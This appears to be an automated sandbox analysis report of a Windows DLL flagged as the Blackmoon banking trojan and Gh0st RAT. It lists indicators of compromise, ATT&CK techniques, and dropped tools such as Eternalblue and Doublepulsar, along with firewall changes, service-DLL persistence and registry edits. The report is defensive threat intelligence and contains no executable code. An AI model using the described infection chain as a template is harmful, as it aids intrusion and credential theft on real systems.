blackmoon | 4492433d53cefa40630f1e69e4d9faec8a3c6e053d5238f4dbf15c80f6174b3a

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-12-2024 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4492433d53cefa40630f1e69e4d9faec8a3c6e053d5238f4dbf15c80f6174b3a.dll
Size

165KB
MD5

b4e9e9c30e8bcbd772c5514eae67eb4e
SHA1

e10cc914137ca1309ab8d6ae9aa1969f6b9fe997
SHA256

4492433d53cefa40630f1e69e4d9faec8a3c6e053d5238f4dbf15c80f6174b3a
SHA512

6c1dd11263615fcf60f82e9251191eec30cc482854115baa5e126ed14b2efce8ff2c6fe58d77c41a016453a6fc94ea79a80fec1905aea35b3a0e9ec4863ad833
SSDEEP

3072:pDPoADAuj34+sqbSFEmjfv2JxhGtBxUYBN46:psAbj3yEmjfvIxhGtBy4N46

Score

10^/10

blackmoon gh0strat banker discovery evasion persistence privilege_escalation rat trojan upx

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 12 IoCs

resource	yara_rule
behavioral1/memory/2596-25-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2596-54-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2596-13556-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2596-13600-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/files/0x000700000001868b-13601.dat	family_blackmoon
behavioral1/memory/2596-13619-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/3276-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_blackmoon
behavioral1/files/0x000500000001970b-13637.dat	family_blackmoon
behavioral1/memory/3276-13640-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_blackmoon
behavioral1/memory/2596-13769-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2596-13792-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2596-13832-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon

Gh0st RAT payload 15 IoCs

resource	yara_rule
behavioral1/memory/2668-9-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-8-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-6-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-3-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-2-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-10-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-11-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2668-13631-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/3276-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_gh0strat
behavioral1/files/0x000500000001970b-13637.dat	family_gh0strat
behavioral1/memory/3276-13640-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_gh0strat
behavioral1/memory/2788-13647-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/2788-13645-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/2788-13650-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/2788-13643-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Gh0strat family
gh0strat
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 12 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2176	netsh.exe
2832	netsh.exe
2436	netsh.exe
2860	netsh.exe
1564	netsh.exe
644	netsh.exe
3136	netsh.exe
3420	netsh.exe
2408	netsh.exe
2480	netsh.exe
2116	netsh.exe
684	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll = "C:\\Users\\Admin\\AppData\\Roaming\\GraphicsPerfSvcs.dll"	Hooks.exe

Executes dropped EXE 11 IoCs

pid	Process
2596	MpMgSvc.exe
3804	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
1692	Wmicc.exe
3204	GetPassword.exe
3276	Hooks.exe
1052	ctfmoon.exe
3324	Meson.exe
3360	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4476	traffmonetizer.exe

Loads dropped DLL 64 IoCs

pid	Process
2668	svchost.exe
2668	svchost.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
3804	Eternalblue-2.2.0.exe
2596	MpMgSvc.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2244	Eternalblue-2.2.0.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
3720	cmd.exe
2668	svchost.exe
2668	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
2596	MpMgSvc.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
3360	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe
4792	Doublepulsar-1.3.1.exe

Unexpected DNS network traffic destination 4 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	124.160.26.219
Destination IP	114.114.114.114
Destination IP	1.226.84.135
Destination IP	110.11.158.238

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15984	api6.my-ip.io

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\GDIPFONTCACHEV1.DAT	traffmonetizer.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\64[1].jpg	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\pid	traffmonetizer.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\GDIPFONTCACHEV1.DAT	traffmonetizer.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2244 set thread context of 2668	2244	rundll32.exe	31
PID 1560 set thread context of 2788	1560	svchost.exe	47

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0035000000018669-16.dat	upx
behavioral1/memory/2596-25-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2668-24-0x0000000003440000-0x0000000003D65000-memory.dmp	upx
behavioral1/memory/2596-54-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2596-13556-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2596-13600-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2596-13619-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/files/0x000500000001962b-13624.dat	upx
behavioral1/memory/3276-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	upx
behavioral1/memory/3276-13640-0x0000000000400000-0x0000000001BF5000-memory.dmp	upx
behavioral1/memory/2596-13769-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2596-13792-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2596-13832-0x0000000000400000-0x0000000000D25000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.MemoryMappedFiles.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XmlSerializer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Contracts.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.TraceSource.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Requests.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encodings.Web.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XDocument.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Debug.dll	svchost.exe
File opened for modification	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Tools.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.UnmanagedMemoryStream.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encoding.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Win32.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Drawing.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Security.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Metadata.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.Encoding.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Tasks.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Thread.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.Compression.ZipFile.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.NameResolution.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.InteropServices.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.InteropServices.RuntimeInformation.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ValueTuple.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Traffmonetizer.exe.config	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.Calendars.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.Queryable.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Base.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Memory.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebSockets.Client.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebSockets.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.VisualC.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Diagnostics.Runtime.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Buffers.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Serialization.Formatters.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebHeaderCollection.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Overlapped.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\root_conf\default.toml	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\netstandard.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.NonGeneric.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.Specialized.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.Writer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.X509Certificates.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.Algorithms.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Data.Common.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Numerics.Vectors.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.RegularExpressions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XmlDocument.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XPath.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Tracing.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.ReaderWriter.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Traffmonetizer.exe	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.Watcher.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ObjectModel.dll	svchost.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 36 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MpMgSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ctfmoon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hooks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wmicc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Meson.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF9F3DDE-C07F-47BC-BBBB-D97087495001}\WpadDecisionReason = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-6a-e1-53-ba-26\WpadDecisionReason = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	Meson.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF9F3DDE-C07F-47BC-BBBB-D97087495001}\WpadDecisionTime = 402443526050db01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	Meson.exe
